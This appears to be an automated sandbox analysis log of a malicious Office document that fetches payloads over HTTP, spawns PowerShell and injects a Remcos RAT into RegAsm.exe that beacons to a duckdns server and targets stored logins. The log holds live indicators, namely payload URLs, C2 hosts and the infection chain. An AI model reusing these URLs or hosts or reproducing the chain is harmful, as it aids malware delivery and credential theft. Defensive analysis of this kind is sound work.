                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 107.172.130.147:80 -> 192.168.2.22:49161
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80
                    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 107.172.130.147:80

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49165 -> 185.236.203.101:51525
                    Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 107.172.130.147:80 -> 192.168.2.22:49163
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49164 -> 185.236.203.101:51525
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 107.172.130.147:80 -> 192.168.2.22:49163
                    Source: Malware configuration extractorURLs: dumboi.duckdns.org
                    Source: unknownDNS query: name: dumboi.duckdns.org
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.236.203.101:51525
                    Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /240/NNCCE.txt HTTP/1.1Host: 107.172.130.147Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
                    Source: Joe Sandbox ViewIP Address: 107.172.130.147 107.172.130.147
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: M247GB M247GB
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49166 -> 178.237.33.50:80
                    Source: global trafficHTTP traffic detected: GET /240/nicepciturewithggreatethingstobe.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.130.147Connection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.22:49162 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: unknownTCP traffic detected without corresponding DNS query: 107.172.130.147
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,9_2_0041B411
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5F4E99BA-2825-465D-9EA9-8065B2078568}.tmpJump to behavior
                    Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /240/nicepciturewithggreatethingstobe.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.130.147Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /240/NNCCE.txt HTTP/1.1Host: 107.172.130.147Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                    Source: RegAsm.exe, 0000000D.00000002.380858282.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.380858282.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: RegAsm.exe, 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: RegAsm.exe, 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: dumboi.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 00000008.00000002.369656883.00000000027A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.130.147
                    Source: powershell.exe, 00000008.00000002.369656883.00000000027A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.130.147/240/NNCCE.txt
                    Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.352057257.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.130.147/240/nicepciturewithggreatethingstobe.tIF
                    Source: EQNEDT32.EXE, 00000002.00000002.352057257.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.130.147/240/nicepciturewithggreatethingstobe.tIFG
                    Source: EQNEDT32.EXE, 00000002.00000002.352057257.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.130.147/240/nicepciturewithggreatethingstobe.tIFW
                    Source: EQNEDT32.EXE, 00000002.00000002.352057257.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.130.147/240/nicepciturewithggreatethingstobe.tIFj
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                    Source: RegAsm.exe, RegAsm.exe, 00000009.00000002.873764967.0000000000513000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.873637791.00000000004C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 00000008.00000002.374107971.00000000066A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000008.00000002.369656883.000000000286C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: powershell.exe, 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                    Source: powershell.exe, 00000006.00000002.376237655.000000000255F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.369656883.0000000002511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                    Source: bhvB7EA.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
